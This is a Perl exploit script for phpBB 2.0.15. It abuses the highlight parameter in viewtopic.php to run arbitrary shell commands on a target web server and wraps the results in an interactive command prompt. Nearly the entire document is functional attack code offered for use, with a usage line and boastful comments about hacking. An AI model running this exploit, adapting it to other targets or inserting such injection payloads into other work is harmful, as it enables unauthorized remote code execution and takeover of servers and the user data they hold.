phpbb2_0_15.pl.txt

`#!/usr/bin/perl   
# Wed Jun 29 19:08:04 CEST 2005 [email protected]  
#  
# phpBB 2.0.15 -re-bug in viewtopic.php  
# The complete Open Source Development with CVS: GNU General Public License  
# Book on using CVS effectively <--------- cvs, is also GPL  
# or http://www.google.es/search?q=programming+howto  
#   
# BLINK! BLINK! BLINK! *** BRUTEFORCE CAPABILITIES *** BLINK! BLINK! BLINK!  
#   
#   
# Example: ./phpbb2_0_15.pl http://www.server.com/viewtopic.php?t=1  
# You can start typing commands.  
# Tested in BSD. Theo.. it works!  
#  
# !dSR: que todos los hackers digan YO!!  
#  
#   
  
  
use strict;  
use IO::Socket;  
  
unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); }  
  
$ARGV[0] =~ m!http://(.*?)/(.*?t=\d+)!;  
my ($server, $port) = split (/:/,$1);  
$port = 80 unless defined($port);  
$server = $1 unless defined($server);  
my ($url, $command) = $2;  
  
print "$server - $port - $url\n";  
  
while () {  
print "phpBB2.0.15> ";  
while(<STDIN>) {  
$command=$_;  
chomp($command);  
last;  
}  
&send($command);  
}  
  
sub send {  
my $ok = 0;  
my $cmd = "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";  
my $string = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n".  
"Host: $server\nPHP: $cmd\n\n\n\n";  
my $socket = IO::Socket::INET->new(PeerAddr => $server,  
PeerPort => $port,  
Proto => "tcp",  
Type => SOCK_STREAM)  
or die "can't connect to: $server : $@\n";  
print $socket $string;  
while(<$socket>) {  
if (/#PHPBBEXPLOIT#/) {  
close($socket) and last if $ok eq 2;  
$ok++;  
next;  
}  
print if $ok eq "1";  
}  
}  
exit 0;  
  
`